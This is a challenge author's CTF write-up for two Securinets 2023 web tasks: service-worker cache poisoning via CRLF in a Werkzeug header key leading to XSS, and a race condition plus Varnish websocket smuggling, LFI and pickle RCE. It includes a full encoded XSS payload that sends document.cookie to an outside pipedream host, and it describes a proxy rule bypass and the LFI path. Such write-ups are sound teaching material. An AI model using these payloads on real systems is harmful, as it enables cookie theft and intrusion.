Securinets CTF QUALS 2K23 - WEB

Securinets Quals 2023 WEB



0 CSP (11 solves)

Attachment: app.py

Challenge link: escape.nzeros.me

In this challenge, the goal is to execute arbitrary JS code in the context of the client's browser. As a proof of concept for the XSS, the player should exfiltrate the admin cookie.

Application architecture

Overview

First, let's explain the non-standard architecture of the application, since a lot of players struggled to understand the communication between the front end and the backend:

- Front-end: Static files (html / js) are served through escape.nzeros.me and are fully accessible by the user browser:

/

/helloworld

/securinets

After opening the url, we can check the client side code for the home page.

The browser registers a service worker for the web application using user-supplied input. But what the hell is a service worker?

    const reg = await navigator.serviceWorker.register(

We will explain this later in the writeup. All we know for now, from the screenshot above, is that there's a file called sw.js. Let's take a look at it.

Without diving too deep into the function bodies, let's see what the code reveals:

    const params = new URLSearchParams(self.location.search)

- There's an interaction with the backend API URL using user-controlled data.

    const putInCache = async (request, response) => {..}

- Is there some caching mechanism?

For now, we are just presenting the architecture of the application, so let's move on to its second part:

- Backend Server API:

You can find the source code of the backend API in the attached file.

    import os

Explaining Service Worker

1) Purpose:

Service Workers are a type of Web Worker that runs in the background of the browser in a single sandboxed thread, separate from the window context, and handles tasks like:

Network requests :

Service Workers can intercept and handle network requests, allowing you to control how requests are made and responses are handled.

Caching:

Service Workers are often used to implement caching strategies to improve the performance of web applications. In this challenge, I used the well-known, simple cache-first strategy: serve cached content if available, or fetch from the network and cache the response if not.

Push notifications:

A typical example of push notification use is when you get disconnected from the internet and a notification pops up (as on Facebook, for example) to indicate that you've gone offline.

These service workers are granted specific privileges, including the ability to manipulate HTTP traffic, in order to manage such features effectively. Consequently, they are meticulously designed with a strong focus on security.
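The cache-first strategy described above can be sketched in a few lines. This is only an illustrative Python model, not the challenge's sw.js: the names `cache_first`, `fake_fetch` and the in-memory dictionary are assumptions made for the example.

```python
from typing import Callable, Dict


def cache_first(url: str, cache: Dict[str, bytes], fetch: Callable[[str], bytes]) -> bytes:
    """Return the cached body for url, or fetch it once and cache it."""
    if url in cache:
        return cache[url]   # cache hit: the network is never contacted
    body = fetch(url)       # cache miss: go to the network
    cache[url] = body       # remember the response for later requests
    return body


# Tiny demonstration with a fake network function that records its calls.
calls = []


def fake_fetch(url: str) -> bytes:
    calls.append(url)
    return b"response for " + url.encode()


cache: Dict[str, bytes] = {}
first = cache_first("/GetToken", cache, fake_fetch)
second = cache_first("/GetToken", cache, fake_fetch)
```

The second call never reaches `fake_fetch`. The flip side is that whatever response was stored first keeps being served, which is why a poisoned entry is so valuable to an attacker.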

What you should know is that a service worker is registered in the browser through navigator.serviceWorker.register(), and that it runs in a separate thread, in a sandboxed context. The DOM can pass data to the service worker at registration time through query parameters: for example, when registering sw.js?user=aaa, the value user=aaa is available inside the service worker through self.location.search. Otherwise, the DOM can communicate with the SW through the postMessage API: the postMessage method lets the DOM send messages to a Service Worker, and vice versa. This can be used to exchange data or trigger actions between the two.

2) SW From a programming perspective:

- A service worker is an event-driven worker registered against an origin and a path. It takes the form of a JavaScript file that can control the web-page/site that it is associated with:

Main events (more are available in documentation):

Install Event: This occurs once when a service worker is initially executed. Websites can use the install event to perform tasks like caching resources. Event handlers like fetch, push, and message can be added to the service worker during installation to control network traffic, manage push messages, and facilitate communication.

Activate Event: Dispatched when an installed service worker becomes fully functional. Once activated, its event handlers are ready to handle corresponding events. The service worker operates until it goes idle, which happens after a short period when the main page is closed. Ongoing tasks freeze until reactivated, often triggered by events like a push message arrival.

- To use a service worker, you need to register it in your web application. This is typically done in your main JavaScript file using the navigator.serviceWorker.register() method.

- Service workers have a lifecycle that includes events like install, activate, and fetch. These events allow you to control how the service worker behaves and interacts with the application.

- Service workers have a specific scope that defines which pages they control. The scope is determined when you register the service worker and can control all pages on a domain or a specific path.

- Service workers require a secure context (HTTPS) to function in most modern browsers. That's why in this task the front end is served over HTTPS and, to avoid mixed content, the backend API is served over HTTPS as well.

- Debugging service workers can sometimes be challenging due to their background nature. Browser developer tools provide tools for inspecting service workers, viewing console output, and testing different scenarios.

Google Chrome: chrome://inspect/#service-workers

Firefox: about:debugging#workers

3) Behaviour of Service Worker in this challenge:

3.1) Registration:

    const ServiceWorkerReg = async () => {

- escape.nzeros.me/?user=a -> sw.js?user=a will be registered.

- Otherwise, if you simply visit escape.nzeros.me/ -> sw.js?user=stranger is registered.

This approach is gaining popularity and is being commonly employed by websites to ensure proper initialization of service workers for visitors. The reason behind this trend is the inherent constraint of service workers, which prevents them from directly accessing document context details. As a result, websites are incorporating search parameters during the service worker registration to effectively transmit the required data.

3.2) Event handlers:

    self.addEventListener('install', (event) => {

When the install event occurs, the mentioned assets are cached.


You can use caches.delete("v1") from the console to delete the cache.

    self.addEventListener('fetch', (event) => {

As the service worker behaves as a proxy between the document context and the server, any fetch initiated by the document is passed to the cacheFirst() function, which follows the simple cache-first strategy already mentioned: serve cached content if available, or fetch from the network and cache the response if not. The SW itself initiates a fetch to the backend API /GetToken using the function getToken(). That request doesn't trigger the fetch event, since it is initiated from the SW and not from the document, so I added a juicy cache for it.

    const cacheFirst = async({request, preloadResponsePromise, fallbackUrl})=>{

If the request is new and not yet cached, this block is executed:

    try {

Now it's clear that there's an authentication mechanism: the SW requests a token from the server and appends it to every request. No cookie is stored, and the client doesn't keep any authentication fingerprint in the document. This is known as a very secure architecture, unless flawed :p Even if you get XSS in an application that uses this strategy, you can't steal the session*, provided the server refreshes the token frequently.

- *Unless you hijack the service worker itself. Note that a service worker can import external scripts using the importScripts() API. Remember the user query param passed to sw.js: if it were passed to importScripts, you could potentially make the SW fetch whatever you want.

Check this article for more information about this modern secure architecture; kudos to the Mercari engineering team for the great article.

3.3) Service Worker persistence

Service worker persistence refers to the ability of a service worker to remain active and functional even after the user closes the web page or navigates away from it. This persistence allows the service worker to continue working in the background, handling tasks such as caching and intercepting network requests, which enables features like offline access, faster loading times, and better performance.

Because service workers can operate independently of the actual web page, they can continue to process events and respond to requests even when the user is not actively interacting with the website. This makes them a powerful tool for creating progressive web applications (PWAs) and improving the user experience by providing seamless interactions, even in challenging network conditions.

Some players complained that the bot's source code wasn't provided; they thought I had forced the cache and that I should have mentioned that you can interact with the bot twice. In my humble opinion, if you search for SW persistence in the browser, you'll conclude that you can feed the bot more than once. Btw, I used this as a bot and didn't write my own custom one.

Backend API


Secure part:

Remember that userid is a user-controlled field. This route sanitizes the content of that field with escape before returning the response:

    return jsonify({'token': token, 'user': str(escape(userid))[:110]}), 200, new_header

The front end /helloworld parses the JSON and reflects the HTML-escaped userid.

    const endpointUrl = 'https://testnos.e-health.software/GetToken';

Juicy part

    new_header["Auth-Token-" + userid] = token

The user-controlled input userid is concatenated to "Auth-Token-" and sent back as the name of an HTTP response header:

    return jsonify({'token': token, 'user': str(escape(userid))[:110]}), 200, new_header

CRLF?? But WAIT!? Doesn't the application server sanitize newlines in headers by default?! Isn't that a security issue? Should the developer sanitize that manually? Indeed, all modern application servers do that sanitization. Here Flask uses Werkzeug 2.3.6, the latest version. This CRLF issue with newlines in headers was raised against an older version, back in 2019, and was fixed by the Werkzeug developers:

https://github.com/pallets/werkzeug/issues/1080

Their fix sanitizes only the VALUE of the header, BUT NOT the KEY.

https://github.com/pallets/werkzeug/blob/41b74e7a92685bc18b6a472bd10524bba20cb4a2/src/werkzeug/datastructures/headers.py#L513

Good for me, i can write a CTF task without forcing crlf injection!
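To see why an unchecked header name is enough to split a response, here is a toy serializer. It is a simplified model written for this explanation, not Werkzeug's code: the function `serialize_response`, the sample userid and the sample bodies are all assumptions. Like the behaviour described above, it validates header values only.

```python
from typing import Dict


def serialize_response(headers: Dict[str, str], body: str) -> str:
    """Toy HTTP serializer that rejects newlines in values but not in keys."""
    lines = ["HTTP/1.1 200 OK"]
    for key, value in headers.items():
        if "\r" in value or "\n" in value:
            raise ValueError("newline in header value")
        lines.append(f"{key}: {value}")  # the key is written out untouched
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Hypothetical attacker-controlled userid: a blank line followed by a fake body.
userid = 'x\r\n\r\n{"token":"t","user":"<img src=x>"}'
token = "abc123"

raw = serialize_response(
    {"Content-Type": "application/json", "Auth-Token-" + userid: token},
    '{"token":"abc123","user":"escaped"}',
)

# A client treats everything after the first blank line as the body.
head, _, rest = raw.partition("\r\n\r\n")
```

In this model the header section ends right after `Auth-Token-x`, and the attacker's JSON is the first thing the client sees as body, ahead of the legitimate one.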

Solution

    {"token":"<script></script>",

This makes /helloworld retrieve our XSS payload when it parses the JSON to reflect the user field (which is supposed to have been sanitized by the backend).

    const endpointUrl = 'https://testnos.e-health.software/GetToken';

You should triple URL-encode the payload, as it passes twice through URLSearchParams.get(), which performs URL decoding: once when registering the SW, and once when retrieving the query param in sw.js.
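The layering can be checked with Python's standard library. The helper names `encode_n` and `decode_n` are made up for this sketch; each decoding hop in the chain strips exactly one layer, so a character has to be encoded once per hop it must survive.

```python
from urllib.parse import quote, unquote


def encode_n(text: str, times: int) -> str:
    """Percent-encode text repeatedly, escaping every reserved character."""
    for _ in range(times):
        text = quote(text, safe="")
    return text


def decode_n(text: str, times: int) -> str:
    """Undo the given number of percent-encoding layers."""
    for _ in range(times):
        text = unquote(text)
    return text


newline_once = encode_n("\n", 1)     # one layer
newline_triple = encode_n("\n", 3)   # three layers, as used in the payload
brace_triple = encode_n("{", 3)
```

`newline_triple` is `%25250A` and `brace_triple` is `%25257B`, which are the sequences visible in the payload below.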

Payload

1 | escape.nzeros.me/?user=%25253A%25252Bdmanaslem%25250A%25250A%25250A%25257B%252522token%252522%25253A%252522%25253Cscript%25253E%25253C%25252Fscript%25253E%252522%25252C%25250A%252522user%252522%25253A%252522%25253Cimg%252520src%25253D%252527%252527%252520onerror%25253Dfetch%252528%252527https%25253A%25252F%25252Feoi92oaut1x2gm5.m.pipedream.net%25252F%25253Ff%25253D%252527%25252Bdocument.cookie%252529%25253E%252522%25257D%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25250A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25250A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25250A%25250A%25250A |

This triggers the registration of the service worker sw.js?user=PAYLOAD.

Then, when the SW makes its first request to the backend API /GetToken?userid=PAYLOAD, the backend answers with a split response whose body is overwritten by the JSON above. The response gets cached, and a call to /helloworld triggers the XSS.

When receiving a split response, the browser truncates the body based on the Content-Length, so I added a lot of whitespace padding to ensure that the browser can parse our newly crafted malicious JSON.

Do you remember the persistence of the SW mentioned above? Now you can send your crafted payload to the bot: the service worker persists even after the bot closes the page. Send it a second link to /helloworld to trigger the XSS.
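The role of the padding can be illustrated with a small model of how a client cuts the body. Everything here is an assumption made for the sketch: the helper names, the sample bodies, and in particular the premise that Content-Length is emitted before the injected header name.

```python
import json


def client_view(raw: bytes) -> bytes:
    """Return the body a client would keep: Content-Length bytes after the first blank line."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return rest[:length]


def parses(body: bytes) -> bool:
    """True if body is valid JSON (trailing whitespace is allowed)."""
    try:
        json.loads(body)
        return True
    except ValueError:
        return False


# The legitimate body is longer than the injected one in this example.
real_body = b'{"token":"' + b"a" * 40 + b'","user":"&lt;b&gt;"}'
injected = b'{"token":"t","user":"<img src=x>"}'


def build(pad: int) -> bytes:
    """Build a split response whose injected JSON is followed by pad spaces."""
    key = b"Auth-Token-x\r\n\r\n" + injected + b" " * pad
    return (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Length: " + str(len(real_body)).encode() + b"\r\n"
        + key + b": abc\r\n\r\n" + real_body
    )


short = client_view(build(0))      # cut lands inside leftover header bytes
padded = client_view(build(200))   # cut lands inside the whitespace padding
```

Without padding, the kept bytes include the tail of the header line and the JSON parse fails. With enough spaces, the cut falls inside the padding and only the injected JSON plus whitespace remains.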

Securinets{Great_escape_with_Crlf_in_latest_werkzeug_header_key_&&_cache_poison}

Check this great writeup for this 0 CSP made by ARESx team && this one made by Bi0s team to see the solution from a player perspective.

Bonus (out of the scope of the challenge)

For the service worker, I said that it cannot communicate with the document, so it has no access to the document cookie. That was the case for a long time, until the CookieStore API was released. Now a SW can read, set and delete cookies.

Since the CookieStore API is async, a nice read & write race condition is discussed here; that may be a good subject for a future CTF task. (All yours.)



Mark4Archive (5 solves)

Attachment: Challenge.zip

Challenge link: 20.197.61.105

Scenario

IDEA

As mentioned, you can give your repo credentials and the repo will be downloaded by the server and analyzed, and a generated vulnerability report will be served. You can check the instructions to see how to retrieve the appropriate token.

When designing the task, I thought about adding a part where the uploaded code would be parsed and processed by CodeQL queries so that the generated report would be a real one, but that would be computationally heavy for the infra, so I made a dummy report.

Analysis

There's a backend and Varnish, which is used for caching and acts as a reverse proxy between the client and the backend server.

After hitting the submit button we get the following in burp history

I just realized one more thing while writing this writeup! I didn't update the client side to open the socket connection to the remote backend; I left it pointing at localhost! I don't want to fake it in the writeup, and it doesn't affect the solution. Regarding the socket connection, we can understand it from the code in "app.py" by checking the route /echo: I basically implemented a simple progress bar logic for when the upload occurs. BTW, if the player starts the challenge locally, he'll notice that the progress bar appears in the front end.

To keep it short, when hitting the submit button there's a request to /echo for the socket communication that displays the progress bar, plus a request to /analyze that handles the main logic of the upload, so let's tackle that first.

/analyze route from analyze.py file:

    import fnmatch

- Checking the input with a regex to match the GitHub format (username, GitHub repo name, branch, token …) and constructing a valid URL.

- dir = UnzipAndSave(valid_url, repo_name, username, "/tmp") is the first call, which downloads the repo into /tmp.

- Checking for the existence of mark4archive, as that name is reserved for the logic of the task and the file will be created by the application:

    for file in os.listdir(f"{dir}/{repo_name}-{branch}"):
        if fnmatch.fnmatch(file, "mark4archive"):
            return "mark4archive is reserved to our service, please choose another name for your file", 400
        try:
            with open(f"{dir}/{repo_name}-{branch}/{file}", "rb") as f:
                first_two_bytes = f.read(2)
                if first_two_bytes == b'\x80\x04':
                    return "This Beta version of the app can't handle this kind of files!", 400
        except Exception as e:
            print("error: ", e)

- If there's no file called mark4archive, we're good: we delete the repo that we put in /tmp with shutil.rmtree(dir), and we assume that the repo is safe, so we can call UnzipAndSave() again, this time feeding it the public folder instead of /tmp: user_access = UnzipAndSave(valid_url, repo_name, username, "public"). Then we create the file "mark4archive": sig = create_signed_mark(f"{user_access}/{repo_name}-{branch}", result)
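The two-byte comparison in the loop above targets the header of a pickle stream. A quick way to see where `b'\x80\x04'` comes from, using only the standard library (the helper name `looks_like_protocol4_pickle` and the sample object are assumptions for this sketch):

```python
import pickle

PROTOCOL_4_MAGIC = b"\x80\x04"  # PROTO opcode followed by the protocol number


def looks_like_protocol4_pickle(data: bytes) -> bool:
    """Mimic the filter: compare only the first two bytes of the file."""
    return data[:2] == PROTOCOL_4_MAGIC


sample = pickle.dumps({"report": "ok"}, protocol=4)
older = pickle.dumps({"report": "ok"}, protocol=3)
```

Protocol 2 and later start with `\x80` followed by the protocol number, so the same object dumped with protocol 3 begins with `\x80\x03` and would not match this particular comparison.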

mark4archive is supposed to hold information about the repo's vulnerability analysis results, in order to construct the report later. So we create that serialized file and sign it with the function create_signed_mark(). Y'all know how much harm pickle can cause with deserialization, so I secured the process: even if you manage to upload a file "mark4archive" with your serialized payload, you won't make it unless you have the secret.
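The challenge's actual signing code is not reproduced in this writeup, so the following is only a minimal sketch of the general idea, assuming an HMAC-SHA256 tag prepended to the pickled bytes. The names `sign_and_pickle`, `verify_then_unpickle` and the secret value are hypothetical.

```python
import hashlib
import hmac
import pickle

SECRET = b"hypothetical-secret"          # stands in for the application secret
TAG_LEN = hashlib.sha256().digest_size   # 32 bytes for SHA-256


def sign_and_pickle(obj, secret: bytes = SECRET) -> bytes:
    """Serialize obj and prepend an HMAC tag computed over the pickled bytes."""
    payload = pickle.dumps(obj)
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return tag + payload


def verify_then_unpickle(blob: bytes, secret: bytes = SECRET):
    """Only call pickle.loads() once the tag has been verified."""
    tag, payload = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad signature")
    return pickle.loads(payload)


def forged_is_rejected() -> bool:
    """A blob signed with the wrong secret must never reach pickle.loads()."""
    forged = sign_and_pickle({"x": 1}, secret=b"attacker-guess")
    try:
        verify_then_unpickle(forged)
        return False
    except ValueError:
        return True
```

With a scheme of this shape, the whole protection rests on the secret staying private: anyone who learns it can sign an arbitrary pickle and have it deserialized.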

For now, there's a race condition in the file upload. As an author, I think race conditions with sleep and threads are overused, so I wanted to create a logical one. Since the GitHub token lasts for a few minutes and we're using GitHub's download-as-zip feature, I want to point out the following:

“You can download a snapshot of any branch, tag, or specific commit from GitHub.com. These snapshots are generated by the git archive command in one of two formats: tarball or zipball. Snapshots don't contain the entire repository history. If you want the entire history, you can clone the repository. For more information, see “Cloning a repository.””

It's obvious that we can download a repo twice using the same download-as-zip link, but it's suspicious that the same token gives you a new snapshot if you push newer commits. In real life that doesn't cause an issue, I guess.

In the context of the challenge, uploading a repo without a mark4archive file passes points 1), 2) and 3) mentioned above. Pushing a commit that adds mark4archive to the same repo right after makes the second call to UnzipAndSave() download the newer repo version into the "public" folder.
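The check-then-use gap can be modelled without any network access. In this sketch, `FakeRemote` stands in for a download link that always serves the latest commit, and `analyze` mirrors the two downloads described above; both names and the callback mechanism are assumptions for illustration.

```python
from typing import Callable, List, Tuple


class FakeRemote:
    """Stand-in for a 'download as zip' URL that always serves the latest commit."""

    def __init__(self, files: List[str]) -> None:
        self.files = list(files)

    def download(self) -> List[str]:
        return list(self.files)

    def commit(self, name: str) -> None:
        self.files.append(name)


def analyze(remote: FakeRemote, between: Callable[[], None] = lambda: None) -> Tuple[str, List[str]]:
    checked = remote.download()      # first download, the copy that gets inspected
    if "mark4archive" in checked:
        return "rejected", checked
    between()                        # window in which the attacker can push a commit
    published = remote.download()    # second download, the copy that gets used
    return "accepted", published


honest = FakeRemote(["README.md"])
honest_result = analyze(honest)

racy = FakeRemote(["README.md"])
racy_result = analyze(racy, between=lambda: racy.commit("mark4archive"))
```

The inspected copy and the published copy come from two separate downloads, so the validation says nothing about what ends up in the public folder.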

Why that much protection for mark4archive ?

Remember that after a successful submit, the application returns a token that we can use in /makereport to generate our PDF report. Let's get back to the code:


- Check the token and construct the path of the repo based on that token.

- verify_and_unpickle(path) is used here to retrieve mark4archive, which holds info about the repo. It checks the signature of the file and, if it was signed with the application secret, performs pickle.loads() and returns the retrieved data, which is passed to write_to_random_file(). This function writes the content retrieved from mark4archive to a random file under /tmp and then hands that random file to the internal API /api/pdf to generate a report.

- /api/pdf?p=PATH generates a PDF with the content of the provided PATH.


THIS IS WHERE I LEFT THE UNINTENDED SOLUTION UNINTENTIONALLY! /api/pdf is a piece of cake that offers Local File Inclusion. Remember the Varnish that acts as a reverse proxy for caching purposes? I wrote a rule that makes this route forbidden:

    sub vcl_recv {

I messed up here: I should've put "/api/pdf" instead of "^/api/pdf". 4 out of the 5 teams who solved the challenge bypassed the rule with "//api/pdf" and got a free LFI. My bad, it was on my todo list and I thought I had fixed it! It's unethical to change a challenge after a team has found an unintended way.
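The difference between the two patterns is easy to reproduce. Python's `re.search` is used here as a stand-in for the regex match in the VCL rule; the `blocked` helper and the sample paths are assumptions for the sketch.

```python
import re

ANCHORED = re.compile(r"^/api/pdf")    # the rule as deployed
UNANCHORED = re.compile(r"/api/pdf")   # the rule as it should have been


def blocked(pattern: "re.Pattern[str]", path: str) -> bool:
    """True if the request path matches the deny rule."""
    return pattern.search(path) is not None


direct = "/api/pdf?p=/etc/hostname"
doubled = "//api/pdf?p=/etc/hostname"
```

The anchored pattern only matches when the URL starts with exactly one slash before `api`, so the doubled slash slips past it, while the unanchored pattern catches both forms.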

The intended ?

Remember the progress bar logic that was implemented in the backend? It uses a websocket to communicate with the client. I used this config to allow websocket communication to pass through Varnish and get forwarded to the backend:

    sub vcl_recv {

Kudos to 0ang3el, who first pointed out the issue of websocket request smuggling using a wrong Sec-WebSocket-Version value that the reverse proxy doesn't validate and forwards to the backend. More about it here. I first tried his PoC with Varnish as the reverse proxy and Werkzeug 2.3.6 as the backend server, but it didn't work for me: the request was refused by the server and Varnish didn't initiate the tunnel.

Instead, if we send a valid upgrade request to the backend server with valid headers (including a valid Sec-WebSocket-Version: 13, without tampering with its value), we can make Varnish return pipe and pass along Connection: upgrade, which leaves the connection between the client and the server open for a few milliseconds, since Varnish forwards the Connection header. Now we can leak the content of /api/pdf through websocket smuggling in the latest version of Varnish.
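As a rough illustration of the idea, and explicitly not the author's script, the two requests that would travel over the same TCP connection can be built like this. The host name, the function name and the exact header set are assumptions; only /echo, /api/pdf?p=PATH and Sec-WebSocket-Version: 13 come from the description above.

```python
import base64
import os
from typing import Tuple


def build_smuggling_requests(host: str, leak_path: str) -> Tuple[bytes, bytes]:
    """Return (upgrade_request, smuggled_request) as raw HTTP/1.1 bytes."""
    # A Sec-WebSocket-Key is 16 random bytes, base64-encoded.
    key = base64.b64encode(os.urandom(16)).decode()
    upgrade = (
        "GET /echo HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\n"
        "Sec-WebSocket-Version: 13\r\n"
        "\r\n"
    )
    # Second request, written to the same socket once the proxy is piping bytes.
    smuggled = (
        f"GET /api/pdf?p={leak_path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "\r\n"
    )
    return upgrade.encode(), smuggled.encode()


upgrade_req, smuggled_req = build_smuggling_requests(
    "challenge.example",  # hypothetical host
    "../../../../../../../usr/src/app/config/__pycache__/config.cpython-37.pyc",
)
```

Sending the bytes would be a matter of opening one socket to the proxy and writing `upgrade_req` followed by `smuggled_req`; whether a short delay is needed between the two is something to determine experimentally.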

Here is my script:


Long story short, now you have an LFI to leak the secret used by the signing mechanism, from ../../../../../../../usr/src/app/config/__pycache__/config.cpython-37.pyc: the file config.py gets deleted at runtime, but it leaves a pycache file with a predictable path.
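Why a leftover .pyc is as good as the source can be shown locally. This sketch compiles a throwaway config.py, deletes it, and reads the constants back from the bytecode file. The variable name `SECRET` and its value are hypothetical, and the 16-byte header size applies to CPython 3.7 and later.

```python
import marshal
import os
import py_compile
import tempfile


def constants_from_pyc(pyc_path: str) -> tuple:
    """Skip the 16-byte .pyc header (CPython 3.7+) and return the module's constants."""
    with open(pyc_path, "rb") as f:
        f.read(16)
        code = marshal.load(f)
    return code.co_consts


with tempfile.TemporaryDirectory() as tmp:
    src = os.path.join(tmp, "config.py")
    with open(src, "w") as f:
        f.write("SECRET = 'hypothetical-signing-secret'\n")
    pyc = py_compile.compile(src, cfile=os.path.join(tmp, "config.pyc"))
    os.remove(src)                         # the source is gone, as in the challenge
    recovered = constants_from_pyc(pyc)    # the bytecode still holds the string
```

The marshal format is tied to the interpreter version, so a cpython-37 file should be loaded with a matching Python; a plain `strings`-style scan of the leaked bytes is a version-independent alternative.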

Now we are free to construct our pickled file with a reverse shell payload, sign it with the secret, trigger the race condition, and generate a report to trigger deserialization, and BOOOM, RCE!
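For readers unfamiliar with why pickle.loads() on attacker data means code execution, here is a harmless demonstration of the mechanism. The class name `Demo` is made up, and the callable is deliberately benign.

```python
import pickle


class Demo:
    """On unpickling, pickle calls whatever callable __reduce__ returned."""

    def __reduce__(self):
        # (callable, args): executed by pickle.loads() instead of rebuilding Demo.
        return (len, ("deserialized",))


blob = pickle.dumps(Demo())
result = pickle.loads(blob)   # runs len("deserialized") during loading
```

`result` is the return value of the call, not a `Demo` instance. Replacing the benign callable with one that spawns a process is what turns a signed mark4archive into RCE.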

Securinets{Race_The_token_smuggling_varnish_and_piiiickle_RCE}

Conclusion

I really appreciated the amount of great feedback I received for these tasks from top CTF web players, and I'm looking forward to contributing more web tasks in the future.

Kudos to my teammate m0ngi for his continuous support throughout my cybersec journey! (The one from whom I learned the real meaning of sharing is caring.)